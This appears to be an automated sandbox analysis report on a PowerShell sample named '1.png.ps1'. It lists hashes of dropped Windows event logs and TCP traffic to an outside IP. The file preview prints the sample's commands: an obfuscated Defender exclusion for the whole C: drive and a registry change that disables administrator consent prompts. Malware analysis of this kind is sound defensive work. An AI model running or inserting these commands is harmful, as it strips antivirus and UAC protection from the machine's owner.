                                                      Preview:ElfChnk.N&......h&......N&......h&...........Q...S....:......................................................................VU.........................................2...=...........................................................................................................................f...............?...........................m...................M...F...............................M...................................................&...........}...................................................**......[&.......L'.MQ........1...&.......................................................................F.....!...A.A............L'.MQ......y...............8...[&...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......}...............I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                      Category:dropped
                                                      Size (bytes):79016
                                                      Entropy (8bit):1.8206194338277624
                                                      Encrypted:false
                                                      SSDEEP:384:yzhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmeUmtcUmbUmHoUYhL6UsE0Zu:wY7L/aUY7L/a
                                                      MD5:A835D083B3C4229718C18791FBEBEB7D
                                                      SHA1:A781EFE898C620800716B3EA7869E81FF7495D2D
                                                      SHA-256:185809067C5731B6394746650577C5654DB80CF4942F80DA77D45317807EE5CA
                                                      SHA-512:B9AAD11FD865E4666C0699DBA5F71EEAA7D881DA655951C494CECE9296F30BF41ABFE4AC8606225DD7F8D4B6AD55D4AB29A644216ACCEE2BA37605C1894A9ACA
                                                      Malicious:false
                                                      Preview:ElfFile.....................................................................................................................\>.eElfChnk......................................1..(4.....m......................................................................j................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................................*..............................................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.2037434911750742
                                                      Encrypted:false
                                                      SSDEEP:48:M0XWmArP+wQNRBEZWTENO4b3BNAo5/6q:xX9NVaO8vAo5/6q
                                                      MD5:C82451B8B632DB0F952402894B5C8105
                                                      SHA1:BA908CAE60A6DD60935AB0437159B6012F3F3AD8
                                                      SHA-256:4CFAB9A10671AED3B1C95F1D1A51983F2A3185E99C1A0C51F4A73CFAB6F5D112
                                                      SHA-512:CB9469475717F08C87F46996777DEC0183A19FECA52654463F49AF769AAEAD0DC3D6AD2127C84FE27503FC50692C2BFD63BE85033B3A5BAFDF1AED671A0AC17B
                                                      Malicious:false
                                                      Preview:ElfChnk.............................................W......................................................................4...........................................F...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...............................................................**...............k>"w.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.081157197385181
                                                      Encrypted:false
                                                      SSDEEP:384:bzhMivNiGipikiHiDizfiaihinFiuiN9ioiKEi/iUEHijVimiHiqiziViHi1iTiM:PnX21ECJYM9QSp
                                                      MD5:C0EF4339CEA12A83B32D475A050F9752
                                                      SHA1:8413F8E4C30CCBA9C823DD8FC6BDAE2F98C65BA8
                                                      SHA-256:CFE4BAA10C2FAFF48052E0B19278229269A69D36ECF4F8D8D973242C5B3F5F0F
                                                      SHA-512:D7BCDFECEC6B0EF8E4AE2EA78F60F315419CB4A64AAD1B82D418FBB844327B5694F3510412F954E1C3405B2EFC45689248C3FDC2ED272E276BAAAD599BA5D399
                                                      Malicious:false
                                                      Preview:ElfChnk.y...............y...................XY..`[....N:....................................................................w..-.................!..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F........................................................................#..........^0......................................o!.......'..............**......y........yOGo...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.3934346794876915
                                                      Encrypted:false
                                                      SSDEEP:768:dkYaIPxanafaba7aLaHa/ababafavaHafaraDa/aHaPanaTajavaDaba7a3a3aDa:fP
                                                      MD5:5BAF4AC56EFCADA568BC21333D8230A6
                                                      SHA1:20C29471E694C8D8DCC31E3BB158C7090C485DEB
                                                      SHA-256:4B666312BFDFB38472C93963DFE3C3078066640C394ACB81DEE78B9FC0886426
                                                      SHA-512:C272675F5E21DE4076BD7E1786D5AB52C6114728A1456DAD7999223FEDF41DEB2D13076AF61B63791D7D3D7B713C6E5CADE8C5C98018512A1035EA738185A3AF
                                                      Malicious:false
                                                      Preview:ElfChnk.........@...............@...............`....o^.......................................................................k.................^...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...........................7...................................**..H...............w.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.314101482518314
                                                      Encrypted:false
                                                      SSDEEP:384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJzXJ+XJsgXJdXJnXJJXJ:2Q0yUkNYwD8imLEVysoD5/
                                                      MD5:189A5A86B1DC643E3DC065A93AF612A1
                                                      SHA1:85808058CFB4E8ABF7A381E4F5DE112FCEB291D4
                                                      SHA-256:4D9E79CAF50933FB2AE39BFCD393478FDD9374259EA9285196C7DB44C9C1E391
                                                      SHA-512:A2F2C9F6C69E599628750F208DDC665A06707B129FD24B07956E7405517C158E1495329F47653B511580A230C4DE7F2EA121933DFB480421A9CAEB65CCA66D92
                                                      Malicious:false
                                                      Preview:ElfChnk......................................>...A..>'.......................................................................f^S................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................3..................................C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.336641567676869
                                                      Encrypted:false
                                                      SSDEEP:384:vhnmumNm1amCmvm/mHhmHm0mom5memtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfi:v9TADcx2M
                                                      MD5:DC75193BF325BC736926A52B23217883
                                                      SHA1:D363ECEE473331E76772FD59D6FB44CE588316B6
                                                      SHA-256:0633931ECA70783BD7EECCA2001B58203598EB57AEAF301B0C8420B8A2B20EBC
                                                      SHA-512:3F16F3203AC9B2E6557945F8D7A0980C72A4A2A30EEC766448AB19966E6DCEAB9BA9C488E487229EEEE638E120943550B06018B663722856E8BC9F7CF0687736
                                                      Malicious:false
                                                      Preview:ElfChnk.............................................?......................................................................C...................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...............................................k...................................&.......!.......................................................**..h..............Gv.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.345096968074752
                                                      Encrypted:false
                                                      SSDEEP:384:8hu2jk924P2n2j2f12o2N2sS2D2d2l2R2N2F2t2u2e2+262a2G2e2O2n2r2X272V:8hR2bbp
                                                      MD5:6DF92F70861D6234E2CFC21C0CDA4035
                                                      SHA1:39EA1671559EACE4A7EB4EFE5340087F5200C968
                                                      SHA-256:E16CD070708D9E3718FF3CE035F02E2EAF2F182ED4FA20AD477E34021B8FA6A1
                                                      SHA-512:35569620E8BE6E9B5E6B6D4A9F6D45E9D080663DE2139B086382DD3C6D1300767AB963A9B981E15C0C7E9615522081823EEE347DD8ADE72E08DE3663DBBF8415
                                                      Malicious:false
                                                      Preview:ElfChnk..............................................sB......................................................................u0l................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................#...................................................&...............................................................**................,.v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):66792
                                                      Entropy (8bit):4.345981301228205
                                                      Encrypted:false
                                                      SSDEEP:768:/5XX0Iup9hpoBiRrt5x/GYL6VW9SXzV54OwaT1BPLcn1:c+yTz1
                                                      MD5:335A055C55DD267F23F942090D977268
                                                      SHA1:CCC454BA19C6E41005614C8B95B9BA114D391A76
                                                      SHA-256:D9D7DA598AA96E2F668568518D53DC363C94484384DBFC612854B41CACBC9731
                                                      SHA-512:A0B766E0BFCF9C111CE4055388AAB5DECEF596DB7F77B72196DD0A002565D854DD13484CFEA1C19926DDE634EEDA3F0D4E0F37D10033697AB372FE748000FBA2
                                                      Malicious:false
                                                      Preview:ElfChnk.7.......x.......7.......x...............p..........................................................................<._.....................j.......x...........D...=.......................................8.......................=...3..........................................Go......0n..f...h.......$o..?.......................(........o......M.......M...F....n...............................................n..............................................................................&...........Q...**......x........=..MQ..........................................................................<.......T.....!................@.=..MQ...."....I...f...Z\.......x....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...(~K.6.......N...............................{.8.9.3.2.6.C.B.8.-.E.0.7.1.-.4.6.4.F.-.B.F.3.5.-.4.5.B.F.2.E.4.9.D.E.B.E.}...2.2.6.5.3.3...B.R.O.K

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.245297483649947
                                                      Encrypted:false
                                                      SSDEEP:384:9s9hdhohUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYS:iBsFpkBixVjZeC
                                                      MD5:17515571C935F8D566A697DD7E94C1F5
                                                      SHA1:5D69F901714F35E026DFB183A08F0AD73FF8980F
                                                      SHA-256:D17C0DF2ADBC16C5CF96FB42C3C9DF1819E5F0CB10050AD7DF9A093B2EAA3A5B
                                                      SHA-512:2C523B36E0322A1398A075E6E107B5A0108C58E9DE8D65978857E21B2C0C21847EB42E6709A325E8FDFFC23F023C1BBDDAAFF365BA1AD92AD493CD878BF75B77
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................x........q......................................................................C..q............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................F...............................................A...............**..H............^...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.2039922160531502
                                                      Encrypted:false
                                                      SSDEEP:384:3hOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVrVqVyFVlVBVjO:3yjb/
                                                      MD5:9539D63813AB2FA37589711D20A022BD
                                                      SHA1:A63A2FB0761BED1AB1A4A6906FBCC7D075A0A925
                                                      SHA-256:A9CDADCD30FD1A08273079252DCE155BDED03FA53D074F6E3F968BE6489C5CA0
                                                      SHA-512:92D87938190687C94C2C6477D37819BEA0276D5A8E743C1A70F8FB117B423AE6ED02203976020D81F14832F2D92257E9A4F6BE19BE129D2CDE903C2B6D8149D2
                                                      Malicious:false
                                                      Preview:ElfChnk......... ............... ............5...7..>.W!.....................................................................Y.7................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v.......................&*..............................................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.331272887071685
                                                      Encrypted:false
                                                      SSDEEP:384:rhpBwBeabT6BwBwyk8BwB27BwBaBwBzBwBBBwBjBwBpBwBRBwBFBwBMBwBKBwB5M:rlabJkBgQM3JH
                                                      MD5:A33EDA2D72F66C5559FA064B95413500
                                                      SHA1:42414FE9E2387ABC2C55FA817B304C114C49B229
                                                      SHA-256:9B210711158C80906B12195A3F1D97EE7D16F22CC3856AA5A19EFA39279537C3
                                                      SHA-512:83135ACE22A42D5C7DFCE4299D8771FAC31366D68DF696F8935D3AEB469C5B51DDABA524840A8C2F501A644A55A1DCBE5C3F0D59BA91373544ED02CC5B1F1D71
                                                      Malicious:false
                                                      Preview:ElfChnk............................................p4z]....................................................................(..............................................=...........................................................................................................................f...............?...........................m...................M...F....................>...........................%..........&.......................&..........._ ..................................................**................F.s.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.41949008702695
                                                      Encrypted:false
                                                      SSDEEP:384:/hf9cUEGTUEEyUEKpUEcwUEA3UETmUEC1dUEt/UE9gUEOUEdUEbUEHUEqUElUEhI:/dFAWBt1zmPg1
                                                      MD5:C989DB8987574DA88D9C3746DBB9F7BF
                                                      SHA1:4527AA575F5AD2D06CDD6E688FE154FA418E555D
                                                      SHA-256:DB72ABAE93FD206D5EF132CD8A181A604B7802DCCEED0EABD67B528F04FCA907
                                                      SHA-512:A39FD94E80964D096E01CFC2B5045815F0332EA24BF5A8E1B26DA311CF6F2C95B168A4541354EEB024CE7484D90A2E0B9098B323425780945500BDD95E256857
                                                      Malicious:false
                                                      Preview:ElfChnk.........~...............~...............h...s}........................................................................`.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................^N..............................................................**................a0q.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Security.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.210267548603257
                                                      Encrypted:false
                                                      SSDEEP:1536:HxSLmkbKOjXJPRNP6HrzEEzuVZqYjjhQxzOOobOoYeT:2
                                                      MD5:96E68DF95E6D8345359FE157B1E637E4
                                                      SHA1:0900D41424D3DE941C3C145DA7D524878222BB7D
                                                      SHA-256:DF5C02AF2527D865C8B1381FAECF1A70B55537C5FCEBD1ED0E5CA21B069143C8
                                                      SHA-512:EF3793E2D7D2071AB374C397FB621898A1DCA2C53F6043CE1FA72FB1BDBA9568184BA123297D23E611749768A2FDBC5CF4398CFFE7E8D9D741B835A30C5D501F
                                                      Malicious:false
                                                      Preview:ElfChnk.................R.......R...........................................................................................<.V.....................s...h...............N...=...................................................N...............................................w.......2.......................+...................................Y...........).......M...P...:...........................&...................................................................................................................**......R........+..MQ...........p&..........p;6.V..]`.K.h=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                      C:\Windows\System32\winevt\Logs\Setup.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):67984
                                                      Entropy (8bit):0.40298025298632584
                                                      Encrypted:false
                                                      SSDEEP:96:KNVaO8vAoWu8YhpO2xNVaO8vAoWu8YhpO2:8V7077hpNV7077hp
                                                      MD5:7706AC4AB2761FC0544069A1550890FD
                                                      SHA1:8D9EB391874DD20863D93ACF5EEC92CC2F6BA713
                                                      SHA-256:463C0E55FB9D57ED8B347658A3435E4B526A4473EB00FC6BB644FEB109156A2B
                                                      SHA-512:5918481F71AA0D3AC9F576D02A78BEFA73FC6936E61B511878A1EBE2F382798A67142C32EBBF1B29439C0F2E7E589086F42B2764513156945E42CF4CBF5C922F
                                                      Malicious:false
                                                      Preview:ElfChnk.............................................-......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...............................................................**..............Pe..MQ........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\System.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):71376
                                                      Entropy (8bit):4.431776667485259
                                                      Encrypted:false
                                                      SSDEEP:768:jFCOfVtWe8FCOfVtWu4dtJG/D7F3ZVFY1O:EGmGGmfu/3
                                                      MD5:DAC69F2F73B4EA0DB27A65CF4996A879
                                                      SHA1:AC943AEFD02DCFD8C3F8E7A4214B8CAE480E20E3
                                                      SHA-256:F5DCE9C780BDF4B818FA3E57EB3D409C071D1282E3B76A642738A8A3C673F7AF
                                                      SHA-512:4DCDB51407E84C3B177E1E3DFA1ED306F00B41DD19D3AAFB88DC9133F77420679DE13D444798478FBBFDDA7FB907095C6EB3FAA83382A7D0F3D2E95866887404
                                                      Malicious:false
                                                      Preview:ElfChnk.................b.......o............#...$..u/:......................................................................u;.....................s...h...............*...=...................................................N...................................@#..........w...............................C...................................U...........).......M...1...:...................................................( ..........................................................."..............................**......h.........'.MQ........1...........1.....#\......Z.........A......M...s....j.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....R........A..............F=.................A....................................N................w............................................................A...............:...............h.........A..............F..................A......).......FN........s............................

                                                      C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.1544912561022125
                                                      Encrypted:false
                                                      SSDEEP:768:s40nKvg9P5Hv+RH/oPZyCkLfRd5F7bYFAr+lwmyKKw7yXY:C5PYf6ZPMZ93Ow8NP9OI
                                                      MD5:DA11698E4D808F3DC194AE164D809D31
                                                      SHA1:E62F661F167437786BA7BEC7CF5316004B598B94
                                                      SHA-256:B710E7155CB66EF8626AB627C5A582C6880463F5F90AF7F8BAEB7CE6C2881E62
                                                      SHA-512:FA81C7078103391F7B4EC233F5591293A2DF90A1FDA31153659AF5C7551961E8CD436847DAAB2AC533CF05A55DDA39EC468A8F3EF5D3B750BEFB666131D6DAB2
                                                      Malicious:false
                                                      Preview:ElfChnk.................y....................m...r..N......................................................................'.W.............................................=..........................................................................................................................._...............8...........................f...................M...c...........................l...&...................................................................................................................**......y...........MQ.........G..&........G...7+R.C.....t........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):5.466348207595811
                                                      TrID:
                                                        File name:1.png.ps1
                                                        File size:451 bytes
                                                        MD5:05894847dc478f521e87e2542811af3b
                                                        SHA1:85f885241b3f1b8e7f02f0375fbc9704fd135648
                                                        SHA256:6b7e8e31e1346fbdff6f98d02e07c69b77b251f85b3b98288086b38c98216da3
                                                        SHA512:1bfaf5ab1365362067b028fd2cb0224000a2fb622955255cbec618064577ba4a8232c4502b8796f804c3518395646da42fa5833bb67fc489e4d4432971ffd30e
                                                        SSDEEP:12:sQkuVQfUfMLsVjhRaEfZyjSurAdF81NFmMrE:JkuYUkoV1VBy2urAdC74
                                                        TLSH:06F0A376CC0882F7EAB57581D651591AE8A5401F403A4C01457CC9216A19A07F6FE1CF
                                                        File Content Preview:powershell Add-MpPreference -ExclusionPath "AAAcAAA:\AAA".replace('AAA','')..Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Force..start-sleep -s 6..

                                                        File Icon

                                                        Icon Hash:3270d6baae77db44

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 18, 2024 14:08:19.388782024 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:19.508294106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:19.508438110 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:19.534662962 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:19.654279947 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857053995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857079983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857134104 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:20.857383013 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857553959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857566118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857687950 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:20.857731104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857742071 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857753992 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857794046 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:20.857846975 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:20.857873917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857889891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:20.857973099 CET4974680192.168.2.10176.113.115.178
